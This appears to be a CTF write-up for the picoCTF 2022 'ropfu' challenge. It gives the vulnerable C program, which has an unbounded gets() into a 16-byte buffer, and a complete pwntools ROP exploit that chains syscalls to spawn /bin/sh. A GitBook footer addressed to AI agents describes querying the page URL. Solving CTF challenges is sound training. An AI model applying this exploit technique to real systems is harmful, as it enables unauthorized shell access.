# ropfu

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 16

void vuln() {
  char buf[16];
  printf("How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n");
  return gets(buf);

}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  vuln();
  
}

```

```python
#!/usr/bin/env python3

from pwn import *
#import time
#from termcolor import colored
#from tqdm import tqdm

elf = ELF("./vuln_patched")
rop = ROP(elf)

context.binary = elf
context.terminal = ["alacritty", "-e", "sh", "-c"]
dbginit = """
b *0x8049dc0
"""

def conn():
    if args.REMOTE:
        r = remote("addr", 1337)
    elif args.GDB:
        r = gdb.debug([elf.path], gdbscript=dbginit)
    else:
        r = process([elf.path])
    return r


def main():
    r = conn()

    sl  = lambda a   : r.sendline(a)
    sla = lambda a,b : r.sendlineafter(a,b)
    ru  = lambda a   : r.recvuntil(a)
    rud = lambda a   : r.recvuntil(a,drop=True)

    offset = 0x1c * b'i'
    eax     = p32(rop.eax.address)
    ebx     = p32(rop.ebx.address)
    ecx     = p32(rop.ecx.address)
    edx_ebx = p32(rop.edx.address)
    syscall = p32(0x08071640)

    sys_write  = p32(0x03)
    sys_execve = p32(0x0b)

    stdin  = p32(0)
    addr   = p32(0x80e6000)
    null   = p32(0)

    payload  = offset
    payload += eax + sys_write
    payload += ebx + stdin
    payload += ecx + addr
    payload += syscall
    payload += eax + sys_execve
    payload += ebx + addr
    payload += ecx + null
    payload += syscall
    ru(b'grasshopper!\n')
    sl(payload)
    r.send(b'/bin/sh\0')
    r.interactive()
    



if __name__ == "__main__":
    main()
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://trees-daily-journal.gitbook.io/trees-daily-journal/ctf-writeups/picoctf/binary-exploitation/picoctf-2022/ropfu.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.